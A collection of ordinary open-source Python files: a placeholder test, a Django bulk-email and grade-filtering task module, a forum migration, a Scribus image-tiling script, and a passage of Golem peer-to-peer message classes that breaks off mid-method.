class SettingsTest(unittest.TestCase):
    """Placeholder test case for codeclib Settings; no assertions yet."""
    def setUp(self):
        # nothing to prepare yet
        pass
    def tearDown(self):
        # nothing to clean up yet
        pass
    def test_cli_arguments(self):
        # TODO
        pass
|
fneuorg/fneuproject
|
tests/settings_test.py
|
Python
|
gpl-3.0
| 863
|
from __future__ import absolute_import, unicode_literals
import csv
from builtins import str
import time
import os, sys
# setting django environment
from django.core.wsgi import get_wsgi_application
from config import *
sys.path.append(SPOKEN_PATH)
os.environ["DJANGO_SETTINGS_MODULE"] = "spoken.settings"
application = get_wsgi_application()
from .models import AsyncCronMail
from datetime import datetime
from django.utils import timezone
from django.conf import settings
import uuid
from django.core.mail import EmailMultiAlternatives
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from smtplib import SMTPException, SMTPServerDisconnected
from django.core.mail import BadHeaderError
from rq.decorators import job
from cron import REDIS_CLIENT, DEFAULT_QUEUE, TOPPER_QUEUE
from rq import Retry
import time
from rq import get_current_job
from django.core.cache import caches
from mdldjango.models import MdlUser, MdlQuizGrades
from events.models import FossMdlCourses, TestAttendance, State, City, InstituteType
from creation.models import FossCategory
def bulk_email(taskid, *args, **kwargs):
    """
    Send the mail described by AsyncCronMail row *taskid* to every address
    listed (one row per recipient, first column) in the task's CSV file.

    Designed to run inside an RQ worker: progress (row_id / sent / errors)
    is checkpointed in ``job.meta`` so a re-run of the same job resumes
    where it stopped.  Each outcome is appended to the task's log file as
    ``address,1`` (sent) or ``address,0,reason`` (failed).  On completion
    the task row is stamped with a summary report and status=True.
    """
    task = AsyncCronMail.objects.get(pk=taskid)
    if task.log_file.name == "":
        # first run: allocate a unique log file under MEDIA_ROOT/emails/
        log_file_name = 'log_email_'+uuid.uuid4().hex+".csv"
        task.log_file.name = 'emails/' + log_file_name
        task.save()
    with open(settings.MEDIA_ROOT + task.log_file.name, "a") as log_file:
        with open(task.csvfile.path, newline='') as csvfile:
            csvreader = list(csv.reader(csvfile, delimiter=' ', quotechar='|'))
            job = get_current_job()
            # resume counters from a previous attempt of this job, if any.
            # NOTE(review): bare except also hides a missing job context.
            try:
                row_id = int(job.meta['row_id'])
            except:
                row_id = 0
            try:
                sent = int(job.meta['sent'])
            except:
                sent = 0
            try:
                errors = int(job.meta['errors'])
            except:
                errors = 0
            for i, row in enumerate(csvreader[row_id:], row_id):
                # checkpoint position before attempting the send
                job.meta['row_id'] = i
                job.save_meta()
                if len(row) < 1:
                    continue
                if i % 10 == 0:
                    # crude throttle: pause 5s every 10 rows
                    print('Total ran: ', i)
                    time.sleep(5)
                email = EmailMultiAlternatives(
                    task.subject, task.message, task.sender,
                    to=[row[0]],
                    headers={
                        "Content-type": "text/html"
                    }
                )
                try:
                    validate_email(row[0])
                    email.attach_alternative(task.message, "text/html")
                    email.send()
                    sent += 1
                    job.meta['sent'] = sent
                    job.save_meta()
                    log_file.write(str(row[0])+','+str(1)+'\n')
                except ValidationError as mail_error:
                    log_file.write(str(row[0])+','+str(0)+','+str(mail_error)+'\n')
                    errors += 1
                    job.meta['errors'] = errors
                    job.save_meta()
                except SMTPException as send_error:
                    log_file.write(str(row[0])+','+str(0)+','+str('SMTP mail send error.')+'\n')
                    errors += 1
                    job.meta['errors'] = errors
                    job.save_meta()
                except BadHeaderError as header_error:
                    log_file.write(str(row[0])+','+str(0)+','+str(header_error)+'\n')
                    errors += 1
                    job.meta['errors'] = errors
                    job.save_meta()
                except ConnectionRefusedError as refused:
                    # NOTE(review): unlike the other handlers, this one does
                    # not persist the error count in job.meta -- confirm.
                    log_file.write(str(row[0])+','+str(0)+','+str('Failed to connect to SMTP server.')+'\n')
                    errors += 1
                except SMTPServerDisconnected as disconnect:
                    log_file.write(str(row[0])+','+str(0)+','+str('Failed to connect to SMTP server.')+'\n')
                    errors += 1
                    job.meta['errors'] = errors
                    job.save_meta()
                except OSError as e:
                    log_file.write(str(row[0])+','+str(0)+','+str('Failed to connect to SMTP server.')+'\n')
                    errors += 1
                    job.meta['errors'] = errors
                    job.save_meta()
    # all rows processed: record the summary on the task row
    task.completed_at = timezone.now()
    task.report = "Total: "+ str(sent+errors)+"\n"+ "Sent: "\
        +str(sent)+"\n"+"Errors: "+ str(errors)
    task.status = True
    task.save()
def async_bulk_email(task, *args, **kwargs):
    # Enqueue the blocking bulk_email job on the default RQ queue; generous
    # timeout because large recipient lists are throttled with sleeps.
    DEFAULT_QUEUE.enqueue(bulk_email, task.pk, job_id=task.job_id, job_timeout='72h')
def filter_student_grades(key=None):
    """
    Resolve a cache key of the form
    ``foss_ids:state_ids:city_ids:grade:institution_type_ids:activation_status:from_date:to_date``
    (id lists are ';'-separated, dates are YYYY-MM-DD or the string 'None')
    into the matching moodle quiz grades and test attendance, store the
    result dict in the 'file_cache' cache under ``key`` and return it
    (or None when grade is 0 / no matching moodle course).

    Fixes: ``user_grade`` was only assigned in the "from and to" and
    "from only" date branches, so calling with only ``to_date`` or with no
    dates raised UnboundLocalError.  The base queryset is now built once
    and narrowed by each date bound independently (the previous inclusive
    ``timemodified__range`` is equivalent to gte+lte).
    """
    key_array = key.split(':')
    foss = FossCategory.objects.filter(pk__in=[int(f) for f in key_array[0].split(';')])
    state = State.objects.filter(pk__in=[int(s) if s != '' else None for s in key_array[1].split(';')])
    city = City.objects.filter(pk__in=[int(c) if c != '' else None for c in key_array[2].split(';')])
    institution_type = InstituteType.objects.filter(pk__in=[int(i) if i != '' else None for i in key_array[4].split(';')])
    grade = int(key_array[3])
    activation_status = int(key_array[5]) if key_array[5] != '' else None
    from_date = key_array[6] if key_array[6] != 'None' else None
    to_date = key_array[7] if key_array[7] != 'None' else None
    if grade:
        try:
            # moodle quiz ids attached to the selected foss categories
            fossmdl = FossMdlCourses.objects.filter(foss__in=foss)
            quiz_ids = [f.mdlquiz_id for f in fossmdl]
            # moodle grades above the threshold, optionally windowed by date
            user_grade = MdlQuizGrades.objects.using('moodle').values_list(
                'userid', 'quiz', 'grade').filter(
                quiz__in=quiz_ids, grade__gte=int(grade))
            if from_date:
                user_grade = user_grade.filter(
                    timemodified__gte=datetime.strptime(from_date, "%Y-%m-%d").timestamp())
            if to_date:
                user_grade = user_grade.filter(
                    timemodified__lte=datetime.strptime(to_date, "%Y-%m-%d").timestamp())
            # {mdl_userid: {quiz_id: [grade, already_counted]}}
            # NOTE(review): a user with several qualifying quizzes keeps only
            # the last one seen here -- confirm this is intended.
            dictgrade = {i[0]: {i[1]: [i[2], False]} for i in user_grade}
            # attendance records that correspond to those users/quizzes and
            # satisfy the location / institution / activation filters
            test_attendance = TestAttendance.objects.filter(
                mdluser_id__in=list(dictgrade.keys()),
                mdlquiz_id__in=quiz_ids,
                test__academic__state__in=state if state else State.objects.all(),
                test__academic__city__in=city if city else City.objects.all(),
                status__gte=3,
                test__academic__institution_type__in=institution_type if institution_type else InstituteType.objects.all(),
                test__academic__status__in=[activation_status] if activation_status else [1, 3]
            )
            filter_ta = []
            for i in range(test_attendance.count()):
                key_quiz = dictgrade.get(test_attendance[i].mdluser_id).get(test_attendance[i].mdlquiz_id)
                if key_quiz:
                    if not key_quiz[1]:
                        # count each (user, quiz) pair at most once
                        dictgrade[test_attendance[i].mdluser_id][test_attendance[i].mdlquiz_id][1] = True
                        filter_ta.append(test_attendance[i])
            result = {'mdl_user_grade': dictgrade, 'test_attendance': filter_ta, "count": len(filter_ta)}
            caches['file_cache'].set(key, result)
            # TOPPER_WORKER_STATUS presumably comes from `from config import *`
            # -- TODO confirm
            if not TOPPER_WORKER_STATUS:
                return result
        except FossMdlCourses.DoesNotExist:
            return None
    return None
def async_filter_student_grades(key):
    """Enqueue filter_student_grades(*key*) on the topper worker queue.

    The cache key is reused as the rq job id.
    """
    TOPPER_QUEUE.enqueue(
        filter_student_grades,
        key,
        job_id=key,
        job_timeout='72h',
    )
|
Spoken-tutorial/spoken-website
|
cron/tasks.py
|
Python
|
gpl-3.0
| 8,023
|
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated migration altering ``Topic.is_locked``.

    Sets ``db_index=True`` and the French verbose name. Migrations are
    immutable history; do not edit the operations retroactively.
    """

    dependencies = [
        # Must be applied after the previous forum migration.
        ("forum", "0003_auto_20150414_2324"),
    ]

    operations = [
        migrations.AlterField(
            model_name="topic",
            name="is_locked",
            # verbose_name is the UTF-8 byte string for "Est verrouillé"
            # ("is locked"); \xc3\xa9 encodes 'é'.
            field=models.BooleanField(default=False, db_index=True, verbose_name=b"Est verrouill\xc3\xa9"),
            preserve_default=True,
        ),
    ]
|
ChantyTaguan/zds-site
|
zds/forum/migrations/0003_auto_20151110_1145.py
|
Python
|
gpl-3.0
| 429
|
#!/usr/bin/env python
# Scribus batch-layout script: tiles a directory of images onto pages
# (A6, landscape), one fixed-size square image frame per file.
from scribus import *
import os, time, datetime, math
######################################
# Input directory. Only the LAST assignment wins; the earlier lines are
# kept as a history of previously used image sets (edit/reorder to switch).
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-16--chunar-banares/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2012-03-21--istanbul-straight/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-04-27--westautobahn-II/128x128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-13--varanasi-deshaked/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-13--varanasi/128"
imagepath = "/data/projects/riverstudies/nile/tiles/2006-12-21-dv--edfu/"
imagepath = "/data/projects/slitscan/malisca/tile-data/2012-01-08--guwahati-north-deshaked/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2013-02-18--amazon-LNK"
imagepath = "/data/projects/slitscan/malisca/tile-data/2013-02-18--amazon/selection/128/"
#imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-13--varanasi-east/128"
#imagepath = "/data/projects/slitscan/malisca/tile-data/2011-06-17--linz-krems/128/"
# ---- page geometry and layout knobs ----
page_size = PAPER_A6
#page_size = (209.9,297.0) #A4
#page_size = (216.2,303.3) #A4 + Lulu bleed
bleed = 6.3
orientation = LANDSCAPE # LANDSCAPE or PORTRAIT
tiles_per_row = 13
offset = 0  # index of the first image to place
margin_fac = 0.2 # 0.25 -- vertical gap between rows, as fraction of tile height
linewidth=0.7  # NOTE(review): defined but unused below
limit = 0  # 0 = no limit (place every image found)
###################################
# Build the list of accepted file extensions (lower- and upper-case).
filetype = []
dicttype = {'j':'.jpg','p':'.png','t':'.tif','g':'.gif','P':'.pdf','J':'.jpeg'}
Dicttype = {'j':'.JPG','p':'.PNG','t':'.TIF','g':'.GIF','P':'.PDF','J':'.JPEG'}
imagetype = "jJptgP"
#valueDialog('Image Types','Enter the Image Types, where\n j=jpg,J=jpeg,p=png,t=tif,g=gif,P=pdf\n "jJptgP" selects all','jJptgP')
for t in imagetype[0:]:
    filetype.append(dicttype[t])
    filetype.append(Dicttype[t])
# Collect matching files, sorted by name.
D=[]
d = os.listdir(imagepath)
d.sort()
for file in d:
    for format in filetype:
        if file.endswith(format):
            D.append(file)
D.sort()
# Derive the tile grid from the page size. The page is used in landscape,
# so width/height are swapped relative to the PAPER_* constant.
page_w = page_size[1]
page_h = page_size[0]
tile_w = page_w / float(tiles_per_row)
tile_h = tile_w
#tile_h = tile_w / 4
num_rows = math.floor(page_h / (tile_h + tile_h * margin_fac))
# Center the rows vertically on the page.
margin_h = (page_h - ( num_rows * tile_h + (num_rows-1) * tile_h * margin_fac )) / 2
progressTotal(len(D))
imagecount = offset
pagecount = 0  # NOTE(review): never updated below
xpos = 0
ypos = margin_h
if not limit > 0:
    limit = len(D)
if len(D) > 0:
    #if newDocument(page_size, (bleed,bleed,bleed,bleed), orientation, 1, UNIT_MILLIMETERS, FACINGPAGES, FIRSTPAGERIGHT, 1):
    if newDocument(page_size, (bleed,bleed,bleed,bleed), orientation, 1, UNIT_POINTS, NOFACINGPAGES, 0, 1):
        while imagecount < limit:
            filename,ext = os.path.splitext(D[imagecount])
            if imagecount < limit:
                # Place one image frame at the current grid position.
                f = createImage(xpos, ypos, tile_w, tile_h)
                loadImage(imagepath + "/" + D[imagecount], f)
                setScaleImageToFrame(scaletoframe=1, proportional=1, name=f)
                setLineStyle(0,f)
                imagecount = imagecount + 1
                # Advance along the row; the small 0.01 overlap avoids
                # hairline gaps between adjacent frames.
                xpos += tile_w - 0.01
                if xpos >= page_w - 0.2:
                    # Row full: wrap to the start of the next row.
                    xpos = 0
                    ypos = ypos + tile_h + tile_h *margin_fac
            # new page
            if (imagecount < limit and ypos + tile_h >= page_h):
                newPage(-1)
                ypos = margin_h
                xpos = 0
            progressSet(imagecount)
        #redrawAll()
        #setRedraw(1)
        setRedraw(1)
        redrawAll()
else:
    result = messageBox ('Not Found','No Images found with\n this search selection',BUTTON_OK)
|
backface/malisca
|
tools/scribus/a6-postkarten.py
|
Python
|
gpl-3.0
| 3,321
|
import abc
import collections
import logging
import time
from golem.core.databuffer import DataBuffer
from golem.core.simplehash import SimpleHash
from golem.core.simpleserializer import SimpleSerializer
logger = logging.getLogger(__name__)
class Message:
    """ Communication message that is sent in all networks """

    # Registry mapping message type id -> Message subclass; populated
    # lazily the first time each subclass is instantiated.
    registered_message_types = {}  # Message types that are allowed to be sent in the network

    def __init__(self, type_, sig="", timestamp=None):
        """ Create new message. If this message type hasn't been registered yet, add this class to registered message
        collection.
        :param int type_: message type (class identifier)
        :param str sig: signature (short data representation signed with private key)
        :param float|None timestamp: creation time; defaults to time.time()
        """
        if type_ not in Message.registered_message_types:
            Message.registered_message_types[type_] = self.__class__
        self.type = type_  # message type (class identifier)
        self.sig = sig  # signature (short data representation signed with private key)
        if timestamp is None:
            timestamp = time.time()
        self.timestamp = timestamp
        self.encrypted = False  # inform if message was encrypted

    def get_type(self):
        """ Return message type
        :return int: Message type
        """
        return self.type

    def get_short_hash(self):
        """ Return short message representation for signature
        :return str: short hash of serialized and sorted message dictionary representation """
        sorted_dict = self._sort_obj(self.dict_repr())
        return SimpleHash.hash(SimpleSerializer.dumps(sorted_dict))

    def _sort_obj(self, v):
        # Recursively produce a deterministically ordered representation of
        # *v* so that equal messages hash identically.
        if isinstance(v, dict):
            return self._sort_dict(v)
        # treat objects as dictionaries
        elif hasattr(v, '__dict__'):
            return self._sort_dict(v.__dict__,
                                   filter_properties=True)
        # strings are iterable (see the case below)
        elif isinstance(v, basestring):  # Python 2: covers str and unicode
            return v
        elif isinstance(v, collections.Iterable):
            # rebuild the container type with recursively sorted elements
            return v.__class__([self._sort_obj(_v) for _v in v])
        return v

    def _sort_dict(self, dictionary, filter_properties=False):
        # NOTE: despite the name this returns a sorted *list* of
        # (key, value) pairs, not a dict — the deterministic ordering is
        # what get_short_hash relies on.
        result = dict()
        for k, v in dictionary.iteritems():  # Python 2 dict iteration
            # optionally drop private attributes and methods when hashing
            # an object's __dict__
            if filter_properties and (k.startswith('_') or callable(v)):
                continue
            result[k] = self._sort_obj(v)
        return sorted(result.items())

    def serialize(self):
        """ Return serialized message
        :return str: serialized message """
        try:
            return SimpleSerializer.dumps([self.type, self.sig, self.timestamp, self.dict_repr()])
        except Exception as exc:
            logger.error("Error serializing message: {}".format(exc))
            raise

    def serialize_to_buffer(self, db_):
        """
        Append serialized message to given data buffer
        :param DataBuffer db_: data buffer that message should be attached to
        """
        assert isinstance(db_, DataBuffer)
        db_.append_len_prefixed_string(self.serialize())

    @classmethod
    def decrypt_and_deserialize(cls, db_, server):
        """
        Take out messages from data buffer, decrypt them using server if they are encrypted and deserialize them
        :param DataBuffer db_: data buffer containing messages
        :param SafeServer server: server that is able to decrypt data
        :return list: list of decrypted and deserialized messages
        """
        assert isinstance(db_, DataBuffer)
        messages_ = []
        for msg in db_.get_len_prefixed_string():
            encrypted = True
            try:
                msg = server.decrypt(msg)
            except AssertionError:
                # Treat an AssertionError from decrypt as "message was sent
                # in plaintext" and fall through with the raw bytes.
                logger.warning("Failed to decrypt message, maybe it's not encrypted?")
                encrypted = False
            except Exception as err:
                # Any other decryption failure: drop the message entirely.
                logger.error("Failed to decrypt message {}".format(str(err)))
                continue
            m = cls.deserialize_message(msg)
            if m is None:
                logger.error("Failed to deserialize message {}".format(msg))
                continue
            m.encrypted = encrypted
            messages_.append(m)
        return messages_

    @classmethod
    def deserialize(cls, db_):
        """
        Take out messages from data buffer and deserialize them
        :param DataBuffer db_: data buffer containing messages
        :return list: list of deserialized messages
        """
        assert isinstance(db_, DataBuffer)
        messages_ = []
        msg_ = db_.read_len_prefixed_string()
        while msg_:
            m = cls.deserialize_message(msg_)
            if m:
                messages_.append(m)
            else:
                # Undeserializable messages are skipped, not fatal.
                logger.error("Failed to deserialize message {}".format(msg_))
            msg_ = db_.read_len_prefixed_string()
        return messages_

    @classmethod
    def deserialize_message(cls, msg_):
        """
        Deserialize single message
        :param str msg_: serialized message
        :return Message|None: deserialized message or none if this message type is unknown
        """
        try:
            msg_repr = SimpleSerializer.loads(msg_)
        except Exception as exc:
            logger.error("Error deserializing message: {}".format(exc))
            msg_repr = None
        # Wire format: [type, signature, timestamp, dict_repr].
        if isinstance(msg_repr, list) and len(msg_repr) >= 4:
            msg_type = msg_repr[0]
            msg_sig = msg_repr[1]
            msg_timestamp = msg_repr[2]
            d_repr = msg_repr[3]
            if msg_type in cls.registered_message_types:
                return cls.registered_message_types[msg_type](sig=msg_sig, timestamp=msg_timestamp, dict_repr=d_repr)
        return None

    @abc.abstractmethod
    def dict_repr(self):
        """
        Returns dictionary/list representation of any subclass message
        """
        # NOTE(review): @abc.abstractmethod has no effect here because
        # Message does not use ABCMeta as its metaclass; subclasses are
        # simply expected to override this method.
        return

    def __str__(self):
        return "{}".format(self.__class__)

    def __repr__(self):
        return "{}".format(self.__class__)
##################
# Basic Messages #
##################
class MessageHello(Message):
    """Handshake message two nodes exchange when introducing themselves."""
    Type = 0
    PROTO_ID_STR = u"PROTO_ID"
    CLI_VER_STR = u"CLI_VER"
    PORT_STR = u"PORT"
    NODE_NAME_STR = u"NODE_NAME"
    CLIENT_KEY_ID_STR = u"CLIENT_KEY_ID"
    RAND_VAL_STR = u"RAND_VAL"
    NODE_INFO_STR = u"NODE_INFO"
    SOLVE_CHALLENGE_STR = u"SOLVE_CHALLENGE"
    CHALLENGE_STR = u"CHALLENGE"
    DIFFICULTY_STR = u"DIFFICULTY"
    METADATA_STR = u"METADATA"

    def __init__(self, port=0, node_name=None, client_key_id=None, node_info=None,
                 rand_val=0, metadata=None, solve_challenge=False, challenge=None, difficulty=0, proto_id=0,
                 client_ver=0, sig="", timestamp=None, dict_repr=None):
        """Create a new introduction message.

        :param int port: listening port
        :param str node_name: uid
        :param str client_key_id: public key
        :param NodeInfo node_info: information about node
        :param float rand_val: random value that should be signed by the other side
        :param dict metadata: additional metadata
        :param boolean solve_challenge: should the other client solve the given challenge
        :param str challenge: challenge to solve
        :param int difficulty: difficulty of the challenge
        :param int proto_id: protocol id
        :param str client_ver: application version
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageHello.Type, sig, timestamp)
        self.proto_id = proto_id
        self.client_ver = client_ver
        self.port = port
        self.node_name = node_name
        self.client_key_id = client_key_id
        self.rand_val = rand_val
        self.node_info = node_info
        self.solve_challenge = solve_challenge
        self.challenge = challenge
        self.difficulty = difficulty
        self.metadata = metadata
        if dict_repr:
            # Restore fields from the serialized form, overriding the
            # keyword arguments above. Key order is kept identical to the
            # original implementation so a missing key raises the same
            # KeyError first.
            for attr, key in (("proto_id", MessageHello.PROTO_ID_STR),
                              ("client_ver", MessageHello.CLI_VER_STR),
                              ("port", MessageHello.PORT_STR),
                              ("node_name", MessageHello.NODE_NAME_STR),
                              ("client_key_id", MessageHello.CLIENT_KEY_ID_STR),
                              ("rand_val", MessageHello.RAND_VAL_STR),
                              ("node_info", MessageHello.NODE_INFO_STR),
                              ("challenge", MessageHello.CHALLENGE_STR),
                              ("solve_challenge", MessageHello.SOLVE_CHALLENGE_STR),
                              ("difficulty", MessageHello.DIFFICULTY_STR),
                              ("metadata", MessageHello.METADATA_STR)):
                setattr(self, attr, dict_repr[key])

    def dict_repr(self):
        """Return the dictionary payload of this hello message."""
        return {MessageHello.PROTO_ID_STR: self.proto_id,
                MessageHello.CLI_VER_STR: self.client_ver,
                MessageHello.PORT_STR: self.port,
                MessageHello.NODE_NAME_STR: self.node_name,
                MessageHello.CLIENT_KEY_ID_STR: self.client_key_id,
                MessageHello.RAND_VAL_STR: self.rand_val,
                MessageHello.NODE_INFO_STR: self.node_info,
                MessageHello.SOLVE_CHALLENGE_STR: self.solve_challenge,
                MessageHello.CHALLENGE_STR: self.challenge,
                MessageHello.DIFFICULTY_STR: self.difficulty,
                MessageHello.METADATA_STR: self.metadata
                }
class MessageRandVal(Message):
    """Reply carrying the signed random value from a hello exchange."""
    Type = 1
    RAND_VAL_STR = u"RAND_VAL"

    def __init__(self, rand_val=0, sig="", timestamp=None, dict_repr=None):
        """Create a message with a signed random value.

        :param float rand_val: random value received from the other side
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageRandVal.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.rand_val = dict_repr[MessageRandVal.RAND_VAL_STR] if dict_repr else rand_val

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageRandVal.RAND_VAL_STR: self.rand_val}
class MessageDisconnect(Message):
    """Notification that the sender is closing the connection."""
    Type = 2
    DISCONNECT_REASON_STR = u"DISCONNECT_REASON"

    def __init__(self, reason=-1, sig="", timestamp=None, dict_repr=None):
        """Create a disconnect message.

        :param int reason: disconnection reason
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageDisconnect.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.reason = dict_repr[MessageDisconnect.DISCONNECT_REASON_STR] if dict_repr else reason

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageDisconnect.DISCONNECT_REASON_STR: self.reason}
class MessageChallengeSolution(Message):
    """Carries the solution to a cryptographic challenge."""
    Type = 3
    SOLUTION_STR = u"SOLUTION"

    def __init__(self, solution="", sig="", timestamp=None, dict_repr=None):
        """Create a message with a signed challenge solution.

        :param str solution: challenge solution
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageChallengeSolution.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.solution = dict_repr[MessageChallengeSolution.SOLUTION_STR] if dict_repr else solution

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageChallengeSolution.SOLUTION_STR: self.solution}
################
# P2P Messages #
################
P2P_MESSAGE_BASE = 1000
class MessagePing(Message):
    """Liveness probe sent between peers."""
    Type = P2P_MESSAGE_BASE + 1
    PING_STR = u"PING"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Create a ping message.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessagePing.Type, sig, timestamp)
        if dict_repr:
            # A deserialized ping must carry its truthy marker flag.
            assert dict_repr.get(MessagePing.PING_STR)

    def dict_repr(self):
        """Return the marker-flag payload."""
        return {MessagePing.PING_STR: True}
class MessagePong(Message):
    """Reply to a ping message."""
    Type = P2P_MESSAGE_BASE + 2
    PONG_STR = u"PONG"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Create a pong message.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessagePong.Type, sig, timestamp)
        if dict_repr:
            # A deserialized pong must carry its truthy marker flag.
            assert dict_repr.get(MessagePong.PONG_STR)

    def dict_repr(self):
        """Return the marker-flag payload."""
        return {MessagePong.PONG_STR: True}
class MessageGetPeers(Message):
    """Request for the remote node's known peers."""
    Type = P2P_MESSAGE_BASE + 3
    GET_PEERS_STR = u"GET_PEERS"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Create a request-peers message.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageGetPeers.Type, sig, timestamp)
        if dict_repr:
            # A deserialized request must carry its truthy marker flag.
            assert dict_repr.get(MessageGetPeers.GET_PEERS_STR)

    def dict_repr(self):
        """Return the marker-flag payload."""
        return {MessageGetPeers.GET_PEERS_STR: True}
class MessagePeers(Message):
    """Carries a list of known peers."""
    Type = P2P_MESSAGE_BASE + 4
    PEERS_STR = u"PEERS"

    def __init__(self, peers_array=None, sig="", timestamp=None, dict_repr=None):
        """Create a message containing information about peers.

        :param list peers_array: list of peers information
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessagePeers.Type, sig, timestamp)
        if dict_repr:
            self.peers_array = dict_repr[MessagePeers.PEERS_STR]
        else:
            # Avoid a shared mutable default.
            self.peers_array = [] if peers_array is None else peers_array

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessagePeers.PEERS_STR: self.peers_array}

    def get_short_hash(self):
        """Hash only the (recursively sorted) peers list."""
        return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.peers_array)))
class MessageGetTasks(Message):
    """Request for the remote node's known tasks."""
    Type = P2P_MESSAGE_BASE + 5
    GET_TASKS_STR = u"GET_TASKS"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Create a request-tasks message.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageGetTasks.Type, sig, timestamp)
        if dict_repr:
            # A deserialized request must carry its truthy marker flag.
            assert dict_repr.get(MessageGetTasks.GET_TASKS_STR)

    def dict_repr(self):
        """Return the marker-flag payload."""
        return {MessageGetTasks.GET_TASKS_STR: True}
class MessageTasks(Message):
    """Carries a list of known tasks."""
    Type = P2P_MESSAGE_BASE + 6
    TASKS_STR = u"TASKS"

    def __init__(self, tasks_array=None, sig="", timestamp=None, dict_repr=None):
        """Create a message containing information about tasks.

        :param list tasks_array: list of task information
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageTasks.Type, sig, timestamp)
        if dict_repr:
            self.tasks_array = dict_repr[MessageTasks.TASKS_STR]
        else:
            # Avoid a shared mutable default.
            self.tasks_array = [] if tasks_array is None else tasks_array

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageTasks.TASKS_STR: self.tasks_array}

    def get_short_hash(self):
        """Hash only the (recursively sorted) tasks list."""
        return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.tasks_array)))
class MessageRemoveTask(Message):
    """Request to remove a given task."""
    Type = P2P_MESSAGE_BASE + 7
    REMOVE_TASK_STR = u"REMOVE_TASK"

    def __init__(self, task_id=None, sig="", timestamp=None, dict_repr=None):
        """Create a remove-task request.

        :param str task_id: task to be removed
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageRemoveTask.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.task_id = dict_repr[MessageRemoveTask.REMOVE_TASK_STR] if dict_repr else task_id

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageRemoveTask.REMOVE_TASK_STR: self.task_id}
class MessageGetResourcePeers(Message):
    """Request for peers that can share resources."""
    Type = P2P_MESSAGE_BASE + 8
    WANT_RESOURCE_PEERS_STR = u"WANT_RESOURCE_PEERS"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Create a request for resource peers.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageGetResourcePeers.Type, sig, timestamp)
        if dict_repr:
            # A deserialized request must carry its truthy marker flag.
            assert dict_repr.get(MessageGetResourcePeers.WANT_RESOURCE_PEERS_STR)

    def dict_repr(self):
        """Return the marker-flag payload."""
        return {MessageGetResourcePeers.WANT_RESOURCE_PEERS_STR: True}
class MessageResourcePeers(Message):
    """Carries a list of resource-sharing peers."""
    Type = P2P_MESSAGE_BASE + 9
    RESOURCE_PEERS_STR = u"RESOURCE_PEERS"

    def __init__(self, resource_peers=None, sig="", timestamp=None, dict_repr=None):
        """Create a message containing information about resource peers.

        :param list resource_peers: list of peers information
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageResourcePeers.Type, sig, timestamp)
        if dict_repr:
            self.resource_peers = dict_repr[MessageResourcePeers.RESOURCE_PEERS_STR]
        else:
            # Avoid a shared mutable default.
            self.resource_peers = [] if resource_peers is None else resource_peers

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageResourcePeers.RESOURCE_PEERS_STR: self.resource_peers}

    def get_short_hash(self):
        """Hash only the (recursively sorted) resource-peers list."""
        return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.resource_peers)))
class MessageDegree(Message):
    """Carries a node's degree in the golem network."""
    Type = P2P_MESSAGE_BASE + 10
    DEGREE_STR = u"DEGREE"

    def __init__(self, degree=None, sig="", timestamp=None, dict_repr=None):
        """Create a message with information about node degree.

        :param int degree: node degree in golem network
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageDegree.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.degree = dict_repr[MessageDegree.DEGREE_STR] if dict_repr else degree

    def dict_repr(self):
